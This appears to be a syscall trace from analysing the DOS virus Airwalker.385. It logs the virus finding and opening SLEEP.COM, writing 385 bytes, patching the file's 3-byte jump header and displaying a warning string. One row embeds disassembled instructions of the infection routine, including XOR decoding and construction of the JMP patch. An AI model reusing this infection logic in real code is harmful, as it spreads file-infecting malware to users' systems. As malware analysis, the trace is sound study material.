.
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-17T22:49:07.514428334Z | 26 | PC: 12ab3 | Set disk transfer address |
| 2018-12-17T22:49:07.516197668Z | 78 | PC: 12abf | Find first file |
| 2018-12-17T22:49:07.527356303Z | 61 | PC: 12afd | Open file (Filename = 'SLEEP.COM') |
| 2018-12-17T22:49:07.53514115Z | 63 | PC: 12b0b | Read file or device (Read 3 bytes on handle 5) |
| 2018-12-17T22:49:07.541988205Z | 66 | PC: 12b1e | Move file pointer |
| 2018-12-17T22:49:07.544274761Z | 44 | PC: 12b2b | Get time 0x12b2b: xchg cl, ch 0x12b2d: add dx, cx 0x12b2f: mov word ptr [bp + 0x171], dx 0x12b33: xor word ptr [bp + 0x15c], 0x1717 0x12b39: xor byte ptr [bp + 0x15e], 0x19 0x12b3e: mov ah, 0x40 0x12b40: mov cx, 0x181 0x12b43: lea dx, word ptr [bp] 0x12b46: pushaw 0x12b47: jmp 0x12bf9 0x12b4a: pop ax 0x12b4b: jb 0x12b76 0x12b4d: sub ax, 3 0x12b50: push bx 0x12b51: mov bx, bp 0x12b53: mov word ptr cs:[bx + 1], ax 0x12b57: mov byte ptr [bx], 0xe9 0x12b5a: pop bx 0x12b5b: mov ax, 0x4200 0x12b5e: xor cx, cx |
| 2018-12-17T22:49:07.547087336Z | 64 | PC: 12bff | Write file or device (Write 385 bytes on handle 5) |
| 2018-12-17T22:49:07.56287066Z | 66 | PC: 12b63 | Move file pointer |
| 2018-12-17T22:49:07.565365528Z | 64 | PC: 12b70 | Write file or device (Write 3 bytes on handle 5) |
| 2018-12-17T22:49:07.572778105Z | 62 | PC: 12b76 | Close file |
| 2018-12-17T22:49:07.58105212Z | 9 | PC: 12a47 | Display string (String= 'WARNING: You have just released the Airwalker.385 virus! ') |